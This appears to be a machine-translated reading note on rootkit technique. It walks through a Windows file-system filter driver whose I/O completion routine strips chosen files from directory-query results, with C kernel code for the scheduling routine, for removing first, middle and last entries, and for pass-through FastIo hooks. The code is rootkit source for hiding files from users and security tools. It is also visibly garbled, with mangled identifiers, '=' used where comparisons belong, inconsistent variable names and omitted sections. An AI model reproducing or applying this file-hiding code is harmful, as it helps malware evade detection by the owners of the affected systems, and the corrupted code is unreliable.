Reading Note _ Rootkit Technology _ file Filter Driver (2)

The first section describes how to hook a disk drive. The following describes how to use scheduling routines to filter files.

The following are standard scheduling routines:

NTSTATUS OurFilterDispatch (IN PDEVICE_OBJECT DeviceObject, in pirp)

{

PIO_STACK_LOCATION currentIrpStack;

...

CurrentIrpStack = IoGetCurrentIrpStackLocation (Irp );

...

IoCopyCurrentIrpStackLocationToNext (Irp );

The following is the most important part of the scheduling routine. Set the I/O completion routine here. Once the underlying driver finishes processing the IRP, it calls this routine, and all filtering operations occur in the completed routine.

IoSetCompletionRoutine (Irp, OurFilterHookDone, NULL, TRUE, TRUE, FALSE );

Return IoCallDriver (hookExt-> FileSystem, Irp );

}

The following is the most important routine-the completion routine. As mentioned above, all the filtering functions are implemented in this routine.

Ntstatus ourfilterhookdone (in pdevice_object deviceobject,

In pirp;

In pvoid contex

)

{

...

Irpsp = iogecurrentirpstacklocation (IRP );

Check a directory query and make sure that passive_level runs.

If (irpsp-> majorfunction = irp_mj_directory_control

& Irpsp-> minorfuncion = irp_mn_query_directory

& Amp; kegetcurrentirql () = passive_level

& IrpSp-> Parameters. QueryDirectory. FileInformationClass = FileBothDirectoryInformation

)

{

PFILE_BOTH_DIR_INFORMATION volatile QueryBuffer = NULL;

PFILE_BOTH_DIR_INFORMATION volatile NexBuffer = NULL;

ULONG bufferLength;

DWORD total_size = 0;

BOOLEAN hide_me = FALSE;

BOOLEAN reset = FALSE;

ULONG size = 0;

ULONG iteration = 0;

QueryBuffer = (PFILE_BOTH_DIR_INFORMATION) Irp-> UserBuffer;

BufferLength = Irp-> IoStatus. Information;

If (bufferLength> 0)

{

Do

{

Dbuplint ("filename: % ws \ n", querybuffer-> filename );

...

Rootkit analyzes the file name and determines whether to hide the file. Files to be hidden can be pre-configured and loaded to a list, or based on the sub-string method (similar to common prefix methods, if a file name contains a set of specified prefix characters or specific file extensions, the file will be hidden ). It is assumed that the file is to be hidden, so a flag is set to indicate:

Hide_me = true;

If the rootkit needs to hide a file, it must modify the querybuffer to delete the associated file items. Rootkit must be processed differently based on whether the file item is the first, intermediate, or last item.

If (hide_me & iteration = 0)

{

To hide the first file in the list, run the following code and check whether it is the only one in the table:

If (irpsp-> flags = sl_return_single_entry) |

(Querybuffer-> nextentryoffset = 0 ))

{

If this item is the only one in the list, run the following code. Clears the Query Buffer and returns zero bytes.

Rtlzeromemory (querybuffer, sizeof (file_both_dir_information ));

Total_size = 0;

}

Else

{

If there are other items after the first item, execute the following code. Fix the total size to be returned and delete the corresponding items.

Total_size-= QueryBuffer-> NextEntryOffset;

Temp = ExAllocatePool (PagedPool, total_size );

If (temp! = NULL)

{

RtlCopyMemory (temp, (PBYTE) Querybuffer + QueryBuffer-> NextEntryOffset), total_size );

RtlZeroMemory (QueryBuffer, total_size + QueryBuffer-> NextEntryOffset );

RtlCopyMemory (QueryBuffer, temp, total_size );

ExFreePool (temp );

}

Set a flag to indicate that QueryBuffer has been corrected:

Reset = TRUE;

}

}

Else if (iteration> 0) & (querybuffer-> nextentryoffset! = 0) & (hide_me ))

{

To hide an item in the middle of a table, run the following code. The program deletes the item and fixes the size to be returned.

Size = (pbyte) inputbuffer + IRP-> iostatus. Information)-(pbyte) querybuffer-> nextentryoffset;

TMP = exallocatepool (pagedpool, size );

If (temp! = NULL)

{

Rtlcopymemory (temp, (pbyte) querybuffer + querybuffer-> nextentryoffset), size );

Total_size-= querybuffer-> nextentryoffset;

Rtlzeromemory (querybuffer, size + querybuffer-> nextentryoffset );

Rtlcopymemory (querybuffer, temp, size );

Exfreepool (temp );

}

Set the reset flag, indicating that querybuffer has been corrected:

Reset = true;

}

Else if (iteration> 0) & (QueryBuffer-> NextEntryOffset = 0) & (hide_me ))

{

To hide the last entry in the table, run the following code. This is much easier, because you only need to delete it from the end of the linked list. It is not considered as a reset to QueryBuffer.

Size = (PBYTE) input Buffer + Irp-> IoStatus. Information)-(PBYE) QueryBuffer;

NextBuffer-> NextEntryOffset = 0;

Total_size-= size;

}

If the buffer has not been corrected (this indicates that the processing of the table has been completed), rootkit processes the next item:

Iteration + = 1;

If (! Reset)

{

NextBuffer = QueryBuffer;

QueryBuffer = (PFILE_BOTH_DIR_INFORMATION) (PBYTE) QueryBufer + QueryBuffer-> NextEntryOffset );

}

}

While (QueryBuffer! = NextBuffer)

After processing is complete, set total_size of the new QueryBuffer in IRP:

IRP-> IOSTATUS. INFORMATION = TOTAL_SIZE;

When necessary, mark the IRP as "pending )":

If (Irp-> PendingReturned)

{

IoMarkIrpPending (Irp );

}

Returned status information:

Return Irp-> IoStatus. Status;

}

If FastIo is executed, the code will adopt different execution paths. First, initialize the scheduling table of FastIo to a function pointer structure:

FAST_IO_DISPATCH OurFastIOHook = {

Sizeof (FAST_IO_DISPATCH ),

FilterFastIoCheckifPossible,

FilterFastIoRead,

....

}

Each function call reaches the actual FastIo call. In other words, no FastIo call is filtered. This is because the query of file and directory lists is not implemented as a FastIo call.